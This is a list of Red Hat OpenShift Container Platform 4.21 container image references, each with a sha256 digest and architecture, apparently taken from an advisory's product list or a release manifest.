"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:2ecec54cb74d1a34486e71b455886ca4a88ee3b4f3e21fba7d7e3d17b00179fc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5c538e8d7cb551cac0459c1971e8bf9800d1db3eaf7e66639ebaeb6c3d9305bb_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:ad92acc19589b0305162857f2a14d8174fc4cb90d5ffc09991f49de756ae61c7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:edcabf99710bd0952e329b0edab7b7a86b93f9d34dfe17d3391c9405210f63dd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:48d9d26f06bc34472304b35f6559e428bd1d599267d1298ccf2b199533af4749_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:52e53301f201de393f91cf3084e814e35fe6f93f0432969fd4c511c2ac51b911_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:7ed4a15043060bc2f6ed0ce98efca2721fe19efd8705ecc23ec410de836b6ac6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:b39b3e7a8be95fb0190842c892edaac58878ef2a3c0e59a59365504aef68c101_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1571d23b7a60a14ca1f6942daa5a4681fec9f1fbdfcece0bc76d552ab96dc45a_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:6427f32947afaea5139673b7561ed3ea36b6d0a9272388146c96636a461d7e4b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:cf354f87320a3b730ade16800a31fd18edd643aa6b652d0249f6f531db8932ad_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dd52af230c401d3e17f80ed764ffc2d176c4f1278fd8be791d8098094acbbfa0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2131f098ee848c2a4190c1fea7410df1e465efd7bec4e62b36df7cfce07872ac_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2fb1acc8f1c8f4091671c53c1e2944c91a123a386233ae093def99b6ef6963a2_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:3c497ebfc92e76d91bdb7d81f44d42d245a87c85ca8752f933a89121e372fcf9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:6032a0dbc7f698d3519118fb73fa99395d08be3c022231a293ba265442c31371_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:47c2783399e696c5e9c87ba45a653580d79f0ff9da2452c6bddc78c504a593be_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:6d6bbab810dd6cf82997f98c6eb27474c2f28ee6139d254e163045ae881ebca3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:ba9149621bc099a23abdf277f9dd9e1577d3e758fbcfeba8a85b4aba674822c4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:f607a04fbff99b8e9fe049182f651c9be0492e6534013aff0743dd5a24954051_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:874f7948285d470527af2f674fc82981f2c2b375ab056e06710d4b63f467db08_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c61aadb6f4c72f47bae25eb36b2b392432b9d1c52c25deb6c168689696092d4d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:d6abeb46b250118c1bc6d79a205fb2a28f1e2c87cc1782856e2b08d57726a242_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:f4dc5a0f19fd2ce83023001e4b8bd3f06d0f551187a8da64e3882783190a48f4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:a9600a1e30aff273ea62fac0e0b765c5aa74f41c3a770740fe7a6bd104d845c0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:c86603a6876ffc9fda19897fae53ce46f5ed1ec490e30c684a224c453146d9f7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:db4ea6f06a95e645bdc99ba1e80ce72119a0333c222c8565139a4481715e943a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:f54a077136b77f7b7f4158ebe48dd8c327ed24f31d1f60bb74e377289c8f388d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:2b28ccc2527b7ee1d7d5eb702ce0cbda80f65f2b70380dcd461b078e85acdb4d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:344986bd16bbbd9fafe104e63c43c8049dec8a4851db413a807e8ae947a6d13c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:431d1f322a4f0234798ba728670ada359bc7671ce4f297907c0c8fcef3f0a881_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:6910c5b5446ae3efd828d830d67e07d64fcd15d03b188c54bcf222c0d9f1f074_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:3ee9539604dee7477d19a5769831e053bfa7b1e5611763a7eadad34bda111015_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:55ba05713a6b9e8a0cde50390e1935ae37f8f8dc8c98c7ee926a69c02605c7fe_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:79fa1f3a57e1db94048a410727dd6bacd4683e1a54bf699d3dd318a84a9ed45b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:b4fd7ff14b54766e058b847d7f91c13dc17bf661e45c07bca5bc9754d20e14ae_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:6c229d2b0ac3ea07cc7703cb778ee27a59b975a194041efa8cb3eea86a48652e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:846447487434a57df9b33f06fb5704fcc96ffa518baf6d99223c4e1795e5c643_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:9650cffbe1a64468fef27a62a960b67059d0d6ed59e2ef09c7900d29133c0864_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:a3972c8b0f417fadf45f1cc1a14543f02586b364171b8e60e7bcb90c98623dd0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:37c8160b545194fe3a91940a9fc8911383fd3674dcbc3135454b6872b04d7c42_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:962110a1c424f7893ae4cf2b7bc6a57a8c0070cbc699029fb0c7503217065dfb_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:e6ea068305ca712061e83e4352b3fa9c2431dca533473928fa3c87ad1dc45a01_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f247b47505e0947c5a733c938a17a899af2faa5f3f0ae29b17ba0a0e30f99235_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:934795c45d33ed58aa148aca6a165a4f38ec9ce88413ed62404da19627e4c465_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:a1a7aff47d11acf486bb1e83bcb6aaffe8bc50dd4c655150708ede4cb9359c6d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:b45ff6b59330f93a7e91e911cb12a3676301613d69b500f139f0c414281bfa84_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e0b7b9cb40746ca2b38791ca125dae22dff7f6afadce2c31c7299c69dc316fac_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:002057809ba8771cebee023519dbfb91a5b4f5102a292695a7d6746e93faaeaf_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:146c6b876b93819d9f783515ad0214f1d0609905d5b0239c1d1c377a8a77f53f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:68fbb392a2e08a7c32f0bcfa78b1e4aacb67df3cae696160d7946013d97d54b7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:b576d483f631013f1beda76d250a739cf9680f8dcf53b4f0146e7998d6c9f0dd_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:20544c6de0614e3e195c9f45aea764132229c619228fa4483f7e418297b96ff6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:7c4b7e341a617380ab6f0dd9a1012fdfe9908afd744a2c81cae644538f881602_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:e4c9cd54f5209f2b1d5b53ded3d40292253c74f8ae3d4db626756ddbc6e11c60_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:f3eaf72bb86601787b4b2f26801528061ac5759c3ff7dc1caabb33a43ff556c5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:32532889f9a19086cc0567dd0375f43e303cb46cc646d8ff896d3599e7fa3cff_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:660e0c3c9ce138815279455fc77017a85398ee6130f0ed5d73c780ba454c6a90_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:7cd0406733f1313f3ec2011e8bce76ab83b044a75e5025fd8913796f03ad9356_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:8c41cf0e7e426f5092ac57f893c807b846a5737aa27882068ec6a982758aa8f1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:3f53284ee9720572b864ab12a87dfb98736e26dfd34e87f3967ec4800bc06b62_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45905152fdf546d05fe323898009781331f8665bb32fe7d91d2fad384ec8732e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45c1bb0d34fbf71bbd0caa65dc531e67575f34d7322e8d5313583aae4e0e2eab_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:f244e67bad477b8d5c57b74804a06fbd7d9403ae3d475ac2af71d927c6f888bd_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:0d786d1acd2b6102b55179f28ea29579c9f95593888305a12ff8574adec158d6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:6f0132e14e165e5d59ab20bb4e869d068aa8954e5aeae47c29cb84cc370b2b0a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:af02bf26ff1d9ffc8db66969f140e90d3318b894f63931b47818143ab1e99ff2_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:fa8c6beaf4228a8f690b70daef15fdde242c3d196e783deaaf4d3769db488d74_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:22f01a38260fffda38bb27bd7b1d5d1af9018f7269fe989778a94046f0b58ade_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:480b04a55b7b86e80cc79c6695ab39b68a9714588eaa2d2c7264481541015651_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:c4d2014bca6fbda58a4797f0f2d5732efc3692a609899ba8ca063afd1103fd77_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:caf64d624cc8e698f0d6cbd583ea3d43b64e46da125b6608dfe4072915d68f43_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:229041be25597926b6cba147a685e9025f1fd38aaccd3ada69f6f08a36a1c3d5_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:41cfbaf6fa7e1c4e9d9ab2bbfaed39024c445e6d9437745ee69ff6b9f1ea73b0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:73502251685a4ceb38593092b7b9678630d7266496bf860ec2abe6bb77afcea0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:fc6d0b64e7e5ccfdec2fa08bab5b2a0d598d2afe6272b593656d8b3c7d9aa725_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-ui-rhel9@sha256:9490248af37278e0b107eef719bea4e4b14e2840f42d5d31c0a546efb9a16ab8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:2e1a0d68274399049a694f58a73c92fcba077c59f50c20da896451b7724f1ebf_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:49dbeb17cd5787537cb5e30dd5d2c7adcf720346613c28004d292a5a554a4fa7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:524c4410d51b126c6097fae3b2ad88ec67900e7b786a9131b7a8e96a194e4847_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:f5cdce5e8eee1b014ff8a0a12181a3d05d5dbb747e8e4114c18d7c891e97a477_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:7662f86e2f8f23582ae548c70dad5458e37256f9c4cdc401be880e319ef591c2_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:cb234cf1c44de4b0b0713b2792e06e115830b115d540b494baccad28139b4fd2_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:7f0514302066e0f199e33be56fe074f7666e223169df5f71b06e06779bdb6e8b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:df3552170db05d67f4e75e756495f62164a28bd7468f4093e43f3a7c13bf7682_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:9c8cebfcb7f84844bb476441b61c60a3c88fc562406c84689958b517282966d3_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:c7609e999d1c88e83dd99682b5756386c274d506704340d78be73efe9e6f35b1_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:07c82fce5e470c7ee9c3c1fdc6c953c962ed119411c88bf5fd4f0a08e3a0b9b7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:83a7a3bb3080d3386eb7fa7debe976a551c272a1d70f31d7cc05a437f175f0c2_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:aa7cbd8edc2a40bf3b8572f48f1174b46134ecd22c1a961984c7989398a5a0ab_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:e9c7cedabf9b749ae2faf9427a229757c3c1c5871054667444168030eab28aab_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f3470dd96c2c29ceef92ea0ab5adfcecead95eba0f1caa1fad96f3fdf50f57c6_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f96eef8cedb41be61dcaf4850e5550582f0d84a306775dfc0c7f9958f18ba7ff_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:5d09872519b5a3247dd7a3d5bd250485dcd750307c3853e2cdf43519889178ff_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:63523bed0624b4db33be2b7a5e8dd3c5b532c70a3ad3083504aebc29e85d3a29_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:20a2d23d2de3e31036ca89f2d629b6d06df5504b8f46c88a6cb5e081aa6afdc8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:c47e8b82686adae62dd7c66b82309407d82166f510384a404343e515b829001d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:cb2a3088916b8d8f9489260792f677a59864ab01e9c62361198549b1f822a80b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:f18c64ad1dd81b9ae774488b6994b6d17f6aeb968e644652150ea08b3f6b4dbb_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:a0f3e8ad332f4e63e1aa2742eef069487fd49f4c335269da7b619f7630907a45_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:d2dfd7ae650a6eaced303a1119f94cc1a7097d7609e2a80d84aef5e6380d902e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:2d622f4dbba3bd91a020a734dc0d8c632e58d56373cae44c4af79cbc81a37cd4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:8a69bf9f6b9f8e3dc685d704d31b4a4eded70bdf33ed57dfa8768c016faae46a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:9d0697a33547102399cbeb0a60f9ebfb2a2eb4d3c0e15efba177a96dd27e60f8_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:c87863f0cd97c592cc54c1fc2ab9fbe1468d6302763eaa7a6530af059382d797_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:2a8fa4bac908dd97a3be2e302eb6ac1431dc3537beed23caf257d2c3f47bbc74_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:98994385568f84af533c448d17ae372eac4a26eda4a6b62277253155e20bae54_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:0b92ec408159a4f0e5308cf58ad89cc4ca40880ce097e0807a19c12f235ca5fc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:291f1185778ccc92e28d235ab30ddb1f85fb94199d3889dcf600f35e60093d4c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:7a6604dbc334622a976776e7725e4eba7ba4e8872a87f49bbb1c6f334b2f6c95_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:b2b43c379dcfac66d038927315c419c7d512ce1dd29b34c7dc74a00f7b63a0d1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5628a2419c5721f274edcfe794c881d1fb2af158788c45fbcb7a33f6db9948d4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:56b71e09ae6780121a1c0a52867782196cd43c3e716093fca3ceb3fde5b66d1f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5c1172fb42f1b34b67f5e2044bb190849bacaf5eebabdafdc82d0a7f1c1a7d84_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:d617cb1a419f9d43b5bfff5bfdc670a9c8d0462b47c474d4d1ccea726c108101_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:03f260cff8faf00b22557be8d6be6f81489e9265b339c3a3053bfe5b1de020e7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:5cc05e80c48b83737bcd3f4622e0eedaed7baf06024c23753ca77ffc11b9b306_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:9df1f434a7eae17b9e335feb35d3cad8d15887bc55d2f20c8720ac17633e88f5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:e3d92a87de3c10beda3aba219657f079cafcd03c6ee0b87bd0826d3f51e85997_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:20f0c4f5e4678aac81a44e5f164627b29bbebfc3e17b5010ea7104309a234476_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:2125f95e12d8c30d743da09f3f8451e70a7b0cd8299b173f748a4affd1aab940_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:42c14c3b43aa86ab4a94d86b737ce7eea32703c70db0a5f0e9ac13f9a8f385cf_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:fe5f92c1647f1b8a6d7c25f4b11bbf310b7f9c2003d9fd8d9659108114330054_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:24b98a6e4bc5f0edd37fcb1a0aefa809cc95d50a22da8059c3a8a6811d1596ad_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:27d6d5aea37e0e535d3db14419f53b898251476c64e9f41f00d2afc308d22293_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:4d0e4a3e50a3bac437c4960c0a079d2148fb8dab6655a761b1d10a1c653633b1_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6c4e49d812a40fa01b187bce2d2f6060df10a06ddb248469465c53c6e8c01415_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:2bcdce58a9dec8306ea7ec58ed588c6def1d0e2891d06b91661cb04a1411242f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:493c047ca44c43a15896612c8df60ed0e65017435c57e5cad41a9ee23b275e71_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:6427135ca011b5cc6539000ab9d3bd9e2d68c7703d1e50423d01a88d8ed90fc6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:b33e8c16ab733fb79f0f690e0288f40e9bf8e03a7477b35120dcd29475fb9310_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:53e8fcbba44d9c73eb93da4c101562634f44646eafb544d4c711431b409ff825_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:73223d1dcb0b0d07decc32ba99eb6875597c1fac474c6c9368f75ef12e342e4d_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:809e1636777dcaaa79d79c5edb76ff243ca743fa119a4988b3ac8b9222d3ba3f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:981dfbf55ceaaaca41ec375ff1a95db0409f443ed70dc84859545af82668280c_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:197df56874e5b85f148dec36d644749d5e1c39e262737beab0fa2f866749876f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:9705094f22d110094312ff158c6fe6576de45d5119f3f236608831fb286e953b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:b710c08d2b2cee582d55d2bb5829b0d35375e04c88a1d2e9b7cef725212d0cba_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:d0c4572792d7337fe9ce11cdd9000ebc8d86b345bc7e8dcb6b2718ad3439c6fe_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:1746abd22482e0307a612a4832326e681ecb67358723df137b076bf13dbe638d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:8fecae242c9d6ef4ea859bbb68219912ce75735c53b350ddca2ef230c1dc17af_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:da2bd0d6afdcf81c37f95aba0ea52d4ee063710a49bf399938ba8dca10f079ef_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:edbe1d6b65c67df5cc6822fc0138938ca4266c792d8dedd8121dc88648d72a16_arm64",
